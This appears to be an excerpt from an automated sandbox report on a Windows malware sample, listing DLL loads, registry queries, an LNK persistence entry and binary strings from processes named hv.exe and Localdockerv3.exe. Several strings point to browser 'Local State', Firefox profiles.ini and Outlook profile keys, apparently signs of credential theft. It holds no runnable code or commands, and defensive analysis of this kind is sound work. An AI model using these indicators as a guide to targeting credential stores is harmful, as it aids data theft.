Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: avifil32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msftedit.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: comsvcs.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmlua.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: avifil32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\hv.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}\InProcServer32

Jump to behavior

Source: tsmbkpqw.4.dr

LNK file: ..\..\Roaming\Chromewizard\hv.exe

Source: C:\Users\user\AppData\Local\Temp\hv.exe

Window found: window name: TMainForm

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

File opened: C:\Windows\SysWOW64\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: 9mauyKC3JW.exe

Static file information: File size 9118184 > 1048576

Source:	Binary string: BC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\41\89\Local State source: Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: Localdockerv3.exe, 00000008.00000003.1971403578.0000000000B26000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: [\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974363760.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: j\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.iniiiNp source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: hv.exe, 00000002.00000002.1491958833.000000000CD00000.00000004.00000800.00020000.00000000.sdmp, hv.exe, 00000002.00000002.1475378967.0000000004002000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776635840.000000000517B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1777986969.0000000005A50000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: H\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\profiles.iniAC source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdb source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1981844538.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979646405.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1989221143.0000000000AF1000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ls\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: Localdockerv3.exe, 00000008.00000003.2071965811.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2091618343.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State-;}P source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\profiles.ini source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "winload_prod.pdb3 source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.inid~} source: Localdockerv3.exe, 00000008.00000003.1997630296.0000000000A9D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: CC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\crosoft.WindowsAlarms source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: Localdockerv3.exe, 00000008.00000003.2071965811.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2160661904.0000000000A93000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2113703918.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2091618343.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: lC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: hv.exe, 00000002.00000002.1491958833.000000000CD00000.00000004.00000800.00020000.00000000.sdmp, hv.exe, 00000002.00000002.1475378967.0000000004002000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776635840.000000000517B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1777986969.0000000005A50000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: Localdockerv3.exe, 00000008.00000002.2164083320.0000000004716000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2168990180.0000000006F13000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2167276865.0000000005F15000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2164818824.0000000004D1A000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2167476156.000000000611F000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2163833523.0000000004517000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2168743092.0000000006D14000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2165292012.0000000005116000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2165803793.000000000551C000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2166502980.0000000005912000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2168051496.0000000006719000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2162708356.0000000003D1F000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2169225892.0000000007118000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: D:\a\pdfium-binaries\pdfium-binaries\pdfium\out\pdfium.dll.pdb source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000003345000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1460868437.000000000D1E2000.00000004.00000001.00020000.00000000.sdmp, hv.exe, 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmp, hv.exe, 00000003.00000002.1553119306.000000006C703000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
